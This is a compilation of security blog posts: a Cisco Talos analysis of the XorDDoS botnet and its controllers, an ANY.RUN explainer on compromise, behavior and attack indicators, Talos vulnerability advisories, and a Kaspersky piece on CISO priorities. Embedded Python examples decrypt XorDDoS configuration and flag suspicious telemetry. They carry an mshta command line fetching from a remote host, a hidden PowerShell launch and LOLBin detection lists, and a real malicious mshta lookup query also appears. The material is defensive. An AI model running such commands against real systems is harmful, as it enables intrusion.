Unmasking the new XorDDoS controller and infrastructure

  • Cisco Talos observed an existing distributed denial-of-service (DDoS) malware known as XorDDoS, continuing to spread globally between November 2023 and February 2025. 
  • A significant finding shows that over 70 percent of attacks using XorDDoS targeted the United States from Nov. 2023 to Feb. 2025. 
  • The language settings of the multi-layer controller, XorDDoS builder and controller binding tool strongly suggest that the operators are Chinese-speaking individuals. 
  • Talos discovered the latest version of the XorDDoS controller, called the “VIP version,” and its corresponding central controller were used to build the DDoS bot network for more sophisticated and widespread attacks. 
  • Talos’ analysis exposes the network connections between the central controller, the sub-controller and the XorDDoS malware in order to highlight the XorDDoS trojan network pattern. This may help victims identify when they are targeted by these trojans.

Linux XorDDoS trojan trend and victimology  


The XorDDoS trojan is a well-known DDoS malware that targets Linux machines, turning them into “zombie bots” that carry out attacks. First identified in 2014, its sub-controller was uncovered in 2015. Based on the simplified Chinese user interface and instructions of the XorDDoS controllers and builder, Talos assesses with high confidence that the operators are Chinese-speaking individuals. 

From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence. This trend is not only due to the widespread global distribution of the XorDDoS trojan but also an uptick in malicious DNS requests linked to its command-and-control (C2) infrastructure. In addition to targeting commonly exposed Linux machines, the trojan has expanded its reach to Docker servers, converting infected hosts into bots. It employs a strategy of Secure Shell (SSH) brute-force attacks to gain remote access to target devices. Once it obtains valid SSH credentials, the attacker leverages root privileges to execute a script that downloads and installs XorDDoS on the compromised device. 

Even though numerous security vendors have already provided solutions and detection methods to capture them, Talos continues to observe attempts to deliver XorDDoS malware.

Figure 1. Cisco Secure Firewall’s monthly malware connection detection statistics.

Between November 2023 and February 2025, Talos observed that the XorDDoS trojan continued to have a global impact, with nearly 50 percent of its successfully compromised victims located in the United States. Additionally, we noted that the compromised systems attempted to target and attack several countries, including Spain, the United States, Taiwan, Canada, Japan, Brazil, Paraguay, Argentina, the United Kingdom, the Netherlands, Italy, Ukraine, Germany, Thailand, China, India, Israel, Venezuela, Switzerland, Singapore, Finland, Australia, Saudi Arabia, France, Turkey, the United Arab Emirates and South Korea.

Figure 2. Percentage of XorDDoS successfully-compromised machines across all regions.

Talos also used our Cisco Secure Network/Cloud Analysis to observe actors using those compromised machines to launch DDoS attacks, and those attacks are global in reach. Notably, we found that the United States accounted for over 70 percent of attempted attacks employing XorDDoS.

Figure 3. Percentage of XorDDoS attempted targets across all regions.

Infection chain  

XorDDoS has long relied on SSH brute-force attacks to spread. It deploys a malicious shell script that attempts numerous root credential combinations across thousands of servers until it successfully accesses a target Linux device. Once inside the machine, XorDDoS implements persistence mechanisms to ensure it launches automatically at system startup, therefore evading detection and termination by security products. To maintain persistence, the malware installs an init script and a cron job script. These scripts are embedded within the malware and perform actions consistent with those outlined in previous reports.

Figure 4. Init script and cron script embedded in trojan.

The latest version of XorDDoS malware continues to use the same decryption function and the XOR key “BB2FA36AAA9541F0” to decrypt its embedded configuration. Once the URLs or IPs are decrypted, they are added to a remote list. This list is then used to establish communication and retrieve commands from the C2 server. Talos used CyberChef to successfully decrypt one of the examples.

Figure 5. Talos CyberChef decryption.

XorDDoS new sub-controller and central controller 

Although the sub-controller for XorDDoS was exposed in 2015, attacks have persisted over the last decade. The panel from 2015 was for version 1.4, the oldest version, which we believe is no longer in use by threat actors. In 2024, Talos discovered a new “VIP” version of the XorDDoS sub-controller, which can control the “VIP version” of the XorDDoS trojan, the first instance of which we traced back to 2017. With the newest version of the XorDDoS sub-controller and trojan builder, Talos believes that this collection is a product suite developed for sale.

Figure 6 shows translated screenshots of the XorDDoS trojan sub-controller and builder. The VIP version of the builder also contains new feature descriptions, which strengthens Talos’ assessment that this is a product meant to be sold. When translated, the description in Figure 7 reads, “Stable Anti-Kick, 100% Packet Sending, Fixes for Over Ten Thousand Online Without Lag. Supports Domain Online, IP Online, with New Packet Sending Code and Wall-Penetration Optimization. Can Send 1024 Packets with Resource Utilization Optimization.”

Figure 6. VIP version sub-controller.
Figure 7. Feature description in the VIP version of the XorDDoS trojan builder.

Talos observed a new version of the sub-controller, which we call the “central controller.” Specifically created for the XorDDoS trojan, the central controller enables threat actors to manage multiple XorDDoS controllers simultaneously. This updated central controller enhances cybercriminals’ ability to coordinate and execute attacks more efficiently, indicating an evolution in their tactics and capabilities.

Figure 8. Example view of central controller controlling each sub-controller.

The central controller can generate a controller binder that injects a DLL file into the XorDDoS controller to bind its network connection and command operation to the sub-controller, allowing the central controller to fully remotely control the sub-controllers.

Figure 9. Generator Setting

The controller binder will establish a connection with the central controller. When running the controller binder on the host, the actor can enter the controller’s process name, allowing them to inject into the process and take control. This straightforward strategy allows the actor to send the DDoS commands to multiple controllers simultaneously. There are two notable facts Talos observed from this central controller. First, when the actor opens the central controller, there is a feature description in its mission list column that, when translated, includes the following:

  • “Check the SYN packet length to make it a large packet, otherwise it will be a small packet. 
  • A round-robin attack is a task performed by all online hosts.
  • Select the host and click the test mode, which means a single host sends a packet.
  • Multiple measurement modes cannot be selected, only one at a time!
  • The round-robin attack needs to be stopped manually.
  • Supports 1024 packages but requires a corresponding sub-controller.
  • The sub-controller of version 1.4 and 1.8 on the underground market cannot use the central controller to send 1024 packages.”

Second, the controller’s creator left their Tencent QQ instant message contact number and nickname on the central controller, while also mentioning other sub-controller versions available on the underground market. This further supports Talos’ assessment that these tools are for sale.

Figure 10. Central controller and controller binder.

Advanced XorDDoS traffic analysis 

Talos’ detailed analysis of these new tools suggests cybercriminals’ continued investment in the development and deployment of the XorDDoS trojan, allowing for more sophisticated and widespread attacks. The entire control flow of these operations demonstrates the adaptability and resilience of these threat actors, emphasizing the ongoing challenge in combating this form of cybercrime. Talos completed a traffic analysis in our sandbox environment, first to analyze how the XorDDoS trojan is connected to the sub-controller, and then to understand how the central controller manages the sub-controller.

Figure 11. XorDDoS control flow diagram.

The connection between the sub-controller and DDoS trojan is the orange line in Figure 11. When the malware is successfully installed in the target system, it will attempt to send encrypted data, including “phone home,” which consists of the CRC Header, uname string release, uname string machine, magic string and hardcoded version string. Talos used CyberChef to provide a decryptor function for this data.

Figure 12. Example of decrypted phone home data.

We noticed that the latest VIP version’s “phone home” CRC header remains unchanged from what Unit 42 previously detailed in a blog post. Since the blog post has already covered the encryption of the XorDDoS trojan’s phone home data, we will focus here on the behavior of the controller’s responses and any modifications in the CRC header.

Once the XorDDoS trojan successfully establishes a connection, the CRC header changes to “5343f096000000000200000000000000000000000000000000000000”, as shown in Figure 13. This functions similarly to basic client-server authentication for establishing a connection. When the controller issues a command to the XorDDoS trojan, it uses the same CRC header to attach the encrypted command, sending it to the trojan. This process, illustrated in Figure 14, helps the XorDDoS trojan verify that the commands are authorized and safe to execute.
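As an added example (not Talos’ code), the two protocol details described in this post, the XOR-keyed embedded configuration from the infection-chain section and the fixed post-connection CRC header above, implemented as a small analyst helper in Python. The key and header bytes are as quoted in this post; the NUL-separated config layout and the reuse of the same key for the command body are assumptions, and every sample is constructed.

```python
"""Added example (not Talos' code): decrypt a XorDDoS-style embedded
configuration with the XOR key quoted in the post and flag TCP payloads
that start with the post-connection header quoted in the post.
Key and header are from the post; all samples below are constructed."""
from __future__ import annotations

# XOR key quoted in the post, applied as a repeating 16-byte key.
XOR_KEY = b"BB2FA36AAA9541F0"

# Header the post says the trojan switches to once the session is up.
# The hex string is copied from the post; padding guards a truncated copy.
HEADER_HEX = "5343f096000000000200000000000000000000000000000000000000"
SESSION_HEADER = bytes.fromhex(HEADER_HEX + "0" * (len(HEADER_HEX) % 2))


def xor_crypt(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_remote_list(blob: bytes) -> list[str]:
    """Decrypt an embedded config blob into its C2 host:port entries.

    Assumption (not stated in the post): entries are NUL-terminated strings,
    so the plaintext is split on NUL and empty pieces are dropped.
    """
    clear = xor_crypt(blob)
    return [piece.decode("ascii", "replace") for piece in clear.split(b"\x00") if piece]


def is_session_payload(payload: bytes) -> bool:
    """True when a TCP payload begins with the fixed post-connection header."""
    return payload.startswith(SESSION_HEADER)


def carve_command(payload: bytes) -> bytes | None:
    """Return the bytes after the header, decrypted.

    Assumption: the command body reuses the configuration key; the post only
    says the command is 'encrypted' and attached behind the same header.
    """
    if not is_session_payload(payload):
        return None
    return xor_crypt(payload[len(SESSION_HEADER):])


def scan_flows(flows: list[tuple[str, bytes]]) -> list[str]:
    """Detection pass: names of flows whose payload carries the session header."""
    return [name for name, payload in flows if is_session_payload(payload)]


# --- constructed samples (not real XorDDoS artefacts or traffic) ---
CONSTRUCTED_CONFIG = xor_crypt(b"198.51.100.7:3306\x00c2.example.invalid:8080\x00")
CONSTRUCTED_FLOWS = [
    ("10.0.0.5->203.0.113.9:3306", SESSION_HEADER + xor_crypt(b"constructed-cmd")),
    ("10.0.0.5->203.0.113.10:443", b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1"),  # TLS-like
]

if __name__ == "__main__":
    print(decrypt_remote_list(CONSTRUCTED_CONFIG))   # ['198.51.100.7:3306', 'c2.example.invalid:8080']
    print(scan_flows(CONSTRUCTED_FLOWS))             # ['10.0.0.5->203.0.113.9:3306']
    print(carve_command(CONSTRUCTED_FLOWS[0][1]))    # b'constructed-cmd'
```

The header match alone is a usable network signature; the carved command is only meaningful if the key-reuse assumption holds for the sample at hand.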

Figure 13. The CRC header changes after successfully establishing a connection.
Figure 14. Network flow of sub-controller sending the command to XorDDoS trojan.

Next, Talos explored the connection between the central controller and the sub-controller, represented by the purple line in Figure 11. The central controller can create a controller binder to inject the sub-controller, thereby gaining full access to it. Once the controller binder successfully takes control of the sub-controller, it sends the sub-controller’s machine information back to the central controller as a “phone home” beacon. This phone home data uses plaintext to send information, which includes the message number, packet size, IP address, hostname and connection port.

Figure 15. Network flow of the phone home connection.

Talos used the central controller to establish a connection with the sub-controller to monitor network traffic. During this process, we observed that the MSG number in the packets increases with each command sent to either the client controller or back to the central controller. As shown in Figure 16, Talos used the central controller to issue commands to start a SYN DDoS attack, stop the attack, and target specific IPs or domains. For every command sent, the MSG number increments. Similarly, each received packet also sees an increase in its MSG number. However, it’s important to note that the MSG numbers for sent packets and received packets are not directly related to each other.

Figure 16. Network flow of central controller sending the command to sub-controller.

Coverage


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64669, 64668 and 64667.

ClamAV detections are also available for this threat: Unix.Dropper.Xorddos::in07.talos

Indicators of Compromise

IOCs for this threat can be found in our GitHub repository here.

Cisco Talos Blog

How Indicators of Compromise, Attack, and Behavior Help Spot and Stop Cyber Threats

In cybersecurity, the three main types of indicators are a critical concept for threat detection and response. These main types are indicators of compromise, behavior, and attack (IOCs, IOBs, IOAs). Let’s elaborate on their essence, difference, and use.  

Distinction in a Nutshell 

Definition
  • IOCs: Artifacts or observables that suggest a system has already been compromised
  • IOBs: Patterns or activities that indicate an attack is in progress or imminent
  • IOAs: Describes the adversary’s TTPs (Tactics, Techniques, and Procedures), often abstracted from specific tools or campaigns

Nature
  • IOCs: Reactive
  • IOBs: Proactive
  • IOAs: Strategic

Type
  • IOCs: Technical evidence left behind
  • IOBs: Behavioral analysis
  • IOAs: High-level behavioral models

Purpose
  • IOCs: Help identify intrusions and data breaches
  • IOBs: Detect and block attacks before they succeed
  • IOAs: Understand and profile attackers across campaigns or tools

Use
  • IOCs: Used in threat detection tools like SIEM, IDS/IPS, antivirus, and EDR. Help correlate logs and trace how an attack occurred. Often shared via threat intelligence feeds.
  • IOBs: Applied in real-time detection by EDR/XDR platforms. Used in behavioral analytics and heuristics. Focus on what the attacker is trying to do, not just the tools used.
  • IOAs: Used in threat modeling, proactive defense, and red teaming. Integrated into MITRE ATT&CK mapping, behavior-based threat hunting. Help anticipate novel attack chains and identify APTs.

Indicators of Compromise 

IOCs are pieces of evidence that suggest that a system, network, or device has been compromised by a cyberattack or malicious activity. They are typically reactive, meaning they are identified after an attack has occurred. 

The main purpose of IOCs is to help detect and confirm security incidents with known threats or malware. They serve as forensic evidence in incident investigations and are necessary for adequate incident response and mitigation. 

More often than not IOCs are specific — tied to a particular malware or campaign.  

IOCs can be classified into:  

  • File-based: malicious file hashes (e.g., MD5, SHA-1, SHA-256), known malware signatures. 
  • Network-based: suspicious IP addresses, domains, URLs, or unusual traffic patterns (e.g., connections to a known command-and-control server). 
  • System-based: registry key changes, unauthorized user accounts, or suspicious processes running. 

Being reactive by their nature, IOCs are of immense help in threat prevention. When used smartly, they can be weaponized to block, disrupt, or preempt similar attacks in the future. 

This function is provided by threat intelligence: SOC teams collect indicators associated with known malware and incidents (malicious IPs, domains, file hashes, or URLs) and blacklist them in their security systems to prevent future communication or execution associated with those IOCs. 

For example, a phishing domain seen in a past attack is added to the block list, preventing any user from accessing it if reused. Potential IOCs can be checked with the help of services like ANY.RUN’s Threat Intelligence Lookup. It searches for information from malware samples added and analyzed in the Interactive Sandbox:

destinationIP:"147.185.221.26"

The IP is flagged as malicious, linked to known malware, and should be blocked 

Another way of using IOCs for proactive protection is setting up decoys (honeypots or honeytokens) to monitor access to known indicators or infrastructure that mimics IOC traits. 

Finally, IOCs reveal which vulnerabilities are being exploited, so teams can prioritize patching or tighten firewall rules accordingly. 

IOCs have their limitations, though. They may not help to detect brand new or advanced threats. It’s important to keep in mind that attackers can easily change IOCs (e.g., domains, hashes), so IOC-based prevention is only as effective as its freshness and context. Context also helps to reduce false positives in detection.  

Context can also be provided by TI Lookup: it supports over 40 search parameters and wildcards, which allow indicators and parameters to be combined in complex search queries:

(syncObjectName:"PackageManager" or syncObjectName:"DocumentUpdater") and syncObjectOperation:"Create"

Combining several IOCs in one search request helps to enrich the indicators with context 

Mutexes often generate false positive alerts in monitoring systems. Malware samples can contain the same objects as legitimate programs, and a lot of mutex names are generic. 

Switching to the Analyses tab in the search results, we see that the combination of mutexes with such innocent general names as PackageManager and DocumentUpdater occurs in malware campaigns of the MuddyWater APT group from Iran, which is exactly as dangerous as an APT group from Iran is supposed to be.  

On the other hand, this combination of mutexes was last spotted in malware samples about four months ago which allows us to consider this signal obsolete.  

Security teams share IOCs via threat intelligence feeds: continuously updated data streams with indicators from fresh malware samples integrated with monitoring and detection systems. ANY.RUN provides Threat Intelligence Feeds in STIX and MISP formats. 

Indicators of Behavior 

IOBs focus on patterns or behaviors that suggest malicious activity, rather than specific artifacts or static signatures. They describe how an attacker operates, often describing tactics, techniques, and procedures (TTPs). In other words, these indicators focus on what an attacker does rather than specific tools or files. 

This enables them to be used for detecting zero-day attacks and unknown or evolving threats that may not have specific IOCs, which makes IOBs useful in proactive threat hunting and monitoring. Suspicious behavior can signal an attack in progress, before significant damage occurs.  

IOBs may refer to:  

  • User Behavior: An account logs in from an unusual location or at an odd time. 
  • System Behavior: A process attempts to access sensitive files repeatedly or executes unauthorized scripts. 
  • Network Behavior: Encrypted traffic spikes to unknown external servers, resembling data exfiltration. 

Thus, typical examples of IOBs are:  

  • Use of living-off-the-land binaries (e.g., rundll32, certutil); 
  • Obfuscation techniques; 
  • Credential dumping after privilege escalation; 
  • Repeated use of valid accounts for persistence.

IOBs also come with a few shortcomings. They require advanced analytics, such as behavioral analysis or machine learning, to identify anomalies. Sophisticated monitoring tools (e.g., SIEM, UEBA) should be employed to work with this family of indicators. They can be resource-intensive to analyze and validate. And they may produce false positives if legitimate behaviors mimic malicious ones. 

ANY.RUN’s Interactive Sandbox allows analysts to observe how malware or suspicious files behave in a controlled environment and detect anomalous behaviors that may indicate a potential threat. For example, in this analysis session we see remote code execution via mshta.exe triggered by a command entered manually by a user and mentioning a (misspelled) CAPTCHA:

Abuse of legitimate Windows component observed in a malware analysis session 

What does this activity indicate? In their latest campaign, Storm-1865 distributed phishing emails impersonating Booking.com. The emails contained links leading to fake CAPTCHA pages designed to build trust and lure users into interaction. The threat actor leveraged the ClickFix technique, instructing victims to paste a malicious command into the Windows command prompt. 


The campaign has been observed delivering several commodity malware families, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, DanaBot, and NetSupport RAT. With the following TI lookup query, we can search through recent public sandbox analyses and find samples with the same malicious activity for further research: 

commandLine:”mshta92.255.57.155/Capcha 

Malware with a typical behavioral pattern found via TI Lookup 

Indicators of Attack 

IOAs are proactive indicators that focus on the intent and actions of an adversary during an attack, emphasizing the “how” and “why” of malicious activity. They aim to detect attacks in real time and to catch them in their early stages (e.g., during reconnaissance, exploitation, or lateral movement). This allows cybersecurity teams to prevent attacks by interrupting the kill chain. 

Examples of IOAs:  

  • Reconnaissance: Unusual port scanning or enumeration of network resources. 
  • Exploitation: Attempts to exploit a known vulnerability (e.g., SQL injection or buffer overflow). 
  • Persistence: Installation of backdoors or scheduled tasks to maintain access. 
  • Lateral Movement: Abnormal internal network traffic, such as attempts to access multiple systems with stolen credentials. 
  • C2 Communication: Process beaconing to rare external IP at intervals. 
  • Credential Theft: LSASS memory access by a non-standard process. 
  • Data Exfiltration: Sensitive files zipped and sent via Dropbox or OneDrive. 

What typical indicators of attack might look like:  

  • Word document spawns PowerShell; 
  • Process injection detected; 
  • A user logs in from two geographies within minutes; 
  • Suspicious lateral movement. 
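To make the three indicator types concrete, here is an added example (not ANY.RUN’s code) that runs the same constructed endpoint telemetry through an IOC blocklist and through behavior rules built from the IOB and IOA examples listed above: a LOLBin such as mshta.exe fetching a remote address (the ClickFix session described earlier), an Office document spawning a shell, and one user logging in from two countries within minutes. Every hash, address, user name and timestamp is constructed, and the rule thresholds are assumptions.

```python
"""Added example (not ANY.RUN's code): run constructed telemetry through an
IOC blocklist and through behavior rules built from the IOB/IOA examples in
the post, to show what each indicator type catches. Every hash, address,
user and timestamp below is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

Hit = tuple[str, str]  # (indicator type, explanation)


@dataclass(frozen=True)
class ProcessEvent:
    parent: str
    image: str
    cmdline: str
    sha256: str
    remote_ip: str | None = None


@dataclass(frozen=True)
class LogonEvent:
    user: str
    country: str
    when: datetime


# --- IOC feed (constructed): static artifacts tied to a known campaign ---
IOC_HASHES = {"c0ffee" * 10 + "abcd"}   # 64 hex chars, constructed
IOC_IPS = {"203.0.113.45"}               # RFC 5737 documentation range

# --- behavior vocabulary taken from the post's IOB/IOA examples ---
LOLBINS = {"mshta.exe", "rundll32.exe", "certutil.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
REMOTE_REF = re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b", re.I)


def ioc_hits(ev: ProcessEvent) -> list[Hit]:
    """Reactive match: only fires on artifacts already present in the feed."""
    hits: list[Hit] = []
    if ev.sha256.lower() in IOC_HASHES:
        hits.append(("IOC", f"{ev.image} hash is on the blocklist"))
    if ev.remote_ip in IOC_IPS:
        hits.append(("IOC", f"{ev.image} connected to blocklisted {ev.remote_ip}"))
    return hits


def behavior_hits(ev: ProcessEvent) -> list[Hit]:
    """Behavior match: fires on how the process acts, whatever its hash."""
    hits: list[Hit] = []
    image, parent = ev.image.lower(), ev.parent.lower()
    # IOB from the post: living-off-the-land binary pulling a remote resource.
    if image in LOLBINS and REMOTE_REF.search(ev.cmdline):
        hits.append(("IOB", f"{ev.image} launched with a remote address"))
    # IOA from the post: an Office document spawning a shell.
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append(("IOA", f"{ev.parent} spawned {ev.image}"))
    return hits


def impossible_travel(logons: list[LogonEvent],
                      window: timedelta = timedelta(minutes=30)) -> list[Hit]:
    """IOA from the post: one user seen in two countries within minutes."""
    hits: list[Hit] = []
    by_user: dict[str, list[LogonEvent]] = {}
    for ev in sorted(logons, key=lambda e: e.when):
        by_user.setdefault(ev.user, []).append(ev)
    for user, evs in by_user.items():
        for prev, cur in zip(evs, evs[1:]):
            gap = cur.when - prev.when
            if prev.country != cur.country and gap <= window:
                minutes = int(gap.total_seconds() // 60)
                hits.append(("IOA", f"{user}: {prev.country} then {cur.country} in {minutes} min"))
    return hits


def triage(events: list[ProcessEvent]) -> list[list[Hit]]:
    """IOC and behavior verdicts per process event, in input order."""
    return [ioc_hits(ev) + behavior_hits(ev) for ev in events]


# --- constructed telemetry (no real samples) ---
LEGIT_HASH = "d" * 64   # stands in for a signed, known-good binary
PROCESS_EVENTS = [
    # ClickFix-style: genuine mshta.exe, unknown server -> no IOC, but an IOB.
    ProcessEvent("explorer.exe", "mshta.exe", "mshta http://198.51.100.7/captcha", LEGIT_HASH, "198.51.100.7"),
    # Office macro handing off to a shell -> IOA, again with no IOC available.
    ProcessEvent("WINWORD.EXE", "powershell.exe", "powershell -nop -w hidden -c placeholder", LEGIT_HASH),
    # Known C2 address from the feed -> IOC only; the process itself looks ordinary.
    ProcessEvent("services.exe", "svchost.exe", "svchost -k netsvcs", LEGIT_HASH, "203.0.113.45"),
    # Benign baseline.
    ProcessEvent("explorer.exe", "notepad.exe", "notepad report.txt", LEGIT_HASH),
]
T0 = datetime(2025, 4, 1, 9, 0)
LOGON_EVENTS = [
    LogonEvent("alice", "DE", T0),
    LogonEvent("alice", "BR", T0 + timedelta(minutes=12)),   # impossible travel
    LogonEvent("bob", "US", T0),
    LogonEvent("bob", "US", T0 + timedelta(minutes=5)),
]

if __name__ == "__main__":
    for ev, hits in zip(PROCESS_EVENTS, triage(PROCESS_EVENTS)):
        print(f"{ev.cmdline!r}: {hits or 'clean'}")
    print(impossible_travel(LOGON_EVENTS))
```

The first two events never touch the IOC feed, which is the gap behavior rules are meant to close; the third is caught only because its address was already shared as an IOC.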

Since IOAs are specific signs of an active or imminent attack, often tied to known TTPs or malicious artifacts, it is possible to research these indicators with the aid of ANY.RUN’s Threat Intelligence Lookup through the Interactive MITRE ATT&CK Matrix.

The Matrix lets you map TTPs to actual samples of malware and phishing threats and view their entire execution chain inside the Interactive Sandbox, as well as collect additional indicators.

Conclusion  

The most valuable aspect of indicators in institutional cybersecurity is of course their potential to help prevent threats and incidents, stop attacks from succeeding, and thus avoid financial loss, operational disruption, and reputation damage. Regularly collecting and using IOCs, IOAs, and IOBs, including with services like ANY.RUN’s TI Lookup and TI Feeds, can help your SOC team fight off threats and keep your infrastructure safe.

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals and 15,000 organizations worldwide. The Interactive Sandbox simplifies malware analysis of threats that target both Windows and Linux systems. The threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.


The post How Indicators of Compromise, Attack, and Behavior Help Spot and Stop Cyber Threats appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog

Eclipse and STMicroelectronics vulnerabilities


Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities found in Eclipse ThreadX and four vulnerabilities in STMicroelectronics.   

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.     

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.      

Eclipse vulnerabilities 

Discovered by Kelly Patterson of Cisco Talos.    

Eclipse ThreadX is an embedded development suite including an operating system that provides performance for resource-constrained devices. 

TALOS-2024-2098 (CVE-2025-0726, CVE-2025-2260) A denial of service vulnerability exists in the NetX HTTP server functionality of Eclipse ThreadX NetX Duo git commit 6c8e9d1. A specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability. 

Two integer underflow vulnerabilities exist in the HTTP server PUT request functionality of Eclipse ThreadX NetX Duo git commit 6c8e9d1, TALOS-2024-2104 (CVE-2025-0727, CVE-2025-2259) and TALOS-2024-2105 (CVE-2025-0728, CVE-2025-2258). Specially crafted network request packets can lead to denial of service. An attacker can send malicious packets to trigger these vulnerabilities. 

STMicroelectronics vulnerabilities 

Discovered by Kelly Patterson of Cisco Talos.    

STMicroelectronics is a European multinational semiconductor contract manufacturing and design company. 

TALOS-2024-2096 (CVE-2024-45064) is a buffer overflow vulnerability in the FileX Internal RAM interface functionality of STMicroelectronics X-CUBE-AZRTOS-WL 2.0.0. A specially crafted set of network packets can lead to code execution. An attacker can send a sequence of requests to trigger this vulnerability. 

TALOS-2024-2097 (CVE-2024-50384, CVE-2024-50385) is a denial-of-service vulnerability in the NetX Component HTTP server functionality. A specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability. 

Two integer underflow vulnerabilities exist in the HTTP server PUT request functionality. For TALOS-2024-2102 (CVE-2024-50594, CVE-2024-50595), a specially crafted series of network requests can lead to denial of service. An attacker can send a sequence of malicious packets to trigger this vulnerability. For TALOS-2024-2103 (CVE-2024-50596, CVE-2024-50597), a specially crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability. 

Cisco Talos Blog

CISO priorities in 2025 | Kaspersky official blog

In late March, the popular CISO MindMap, a cheat sheet on infosec team priorities, was updated. However, the economic landscape began shifting just days after its release. Now that the likelihood of economic instability, recession, falling oil prices, and rising microchip costs has increased, many companies and their CISOs face a pressing issue: cost optimization. In light of these developments, we decided to examine the CISO MindMap from a different angle, and highlight new or crucial infosec projects that can contribute to budget savings without creating excessive organizational risks.

Optimization of tools

MindMap authors advise CISOs to “consolidate and rationalize infosec tools”. In an IDC study from 2024, something like half of all large organizations surveyed used more than 40 infosec tools, and a quarter – more than 60. This abundance typically leads to decreased productivity, employee fatigue from unsynchronized and uncoordinated alerts, and excessive expenditure.

The solution lies in either consolidating the tech stack under a single-vendor approach (one vendor for the security platform and all its components), or selecting the best tool in each category. The latter approach requires (i) strict compliance with open communication standards, and (ii) API integration capabilities. It’s better suited for technologically mature teams capable of allocating internal resources (primarily time) to properly and efficiently set up integrations according to the infosec department’s procedures.

For effective stack consolidation, there are specialized planning tools that can assess all infosec systems that have been implemented, identify gaps in coverage, and pinpoint areas of significant functional overlap. This analysis also reveals inefficiently used tools that can be safely eliminated. For some niche and infrequent tasks, open-source tools can bring about budget savings. However, for large systems like SIEM that see regular use, open-source solutions may not be cheaper than proprietary ones due to the extensive efforts required for implementation, fine-tuning and support.

Consolidation often goes hand-in-hand with automation, which is only achievable with a well-synchronized toolset. In the same above-mentioned IDC study, it was found that companies that consolidated their tools and adopted modern XDR and SOAR solutions achieved average cost savings of 16% and analyst time savings of 20%. Simultaneously, they saw an improvement in organizational security with Mean Time to Respond (MTTR) decreasing by 21% and incident resolution time by 19.5%.

Automation

While automation projects initially involve additional expenses, their implementation in infosec processes pays off in the long run by saving analyst time and mitigating the talent shortage. Automation is not necessarily based on neural networks and language models, but these trendy technologies are already making practical contributions in several infosec areas. Tangible results are primarily achievable through the following measures:

  • Selective incident response automation
  • Alert prioritization in the monitoring center
  • Application of infosec policies to accounts and resources
  • Verification of compliance of internal policies with regulatory ones and enforcement of these policies
  • Risk assessment and prioritization of infosec controls
  • Automated third-party risk management (TPRM)

Generative AI

Despite the economic challenges, many companies continue to prioritize the implementation of AI-powered tools, viewing these as essential for future competitiveness and economic efficiency. Some organizations have even issued management directives such as “Before you hire a new employee, prove that AI cannot do their job.”

From the infosec perspective, the widespread adoption of AI-powered technology has both advantages and disadvantages. On the one hand, the vast and poorly understood array of AI tools creates a significant additional workload on infosec teams. On the other, it provides an opportunity to launch and fund various infosec initiatives within the broader corporate AI implementation program. To effectively manage AI-related risks, a company needs to do the following:

  • Establish standards and regulations for the use of AI-powered solutions, while keeping in mind the rapidly evolving regulatory landscape in this area
  • Create a controlled list of approved AI tools for different departments and processes
  • Regularly review recommendations and verify that all AI-driven processes comply with infosec policies
  • Include AI tools in the asset inventory for vulnerability management and infosec assessments
  • Develop specialized training programs for both AI users and infosec personnel

Using open-source AI solutions instead of proprietary cloud systems can reduce operational costs and enhance data protection – especially when the solutions are deployed within the organization’s network or in a private cloud. However, the availability of suitable, high-quality open-source models depends on the specific use case.

Meaningful infosec metrics

This area doesn’t require substantial financial investment but it significantly simplifies the process of justifying infosec budgets to the board of directors. The composition of key metrics varies across industries and companies, but the following groups are worth considering:

  • Risk level and achieved risk reduction expressed in financial terms
  • Organizational readiness for attacks (MTTR, MTTD) and its trends
  • Progress in ongoing infosec projects, including automation and tool consolidation
  • Effectiveness of infosec measures and its trends: average time to remediate critical and other vulnerabilities, percentage of users successfully passing cybersecurity testing, and so on

Identity management

While implementing comprehensive IAM solutions can be expensive, companies can find a balance that provides significant risk reduction at a reasonable cost.

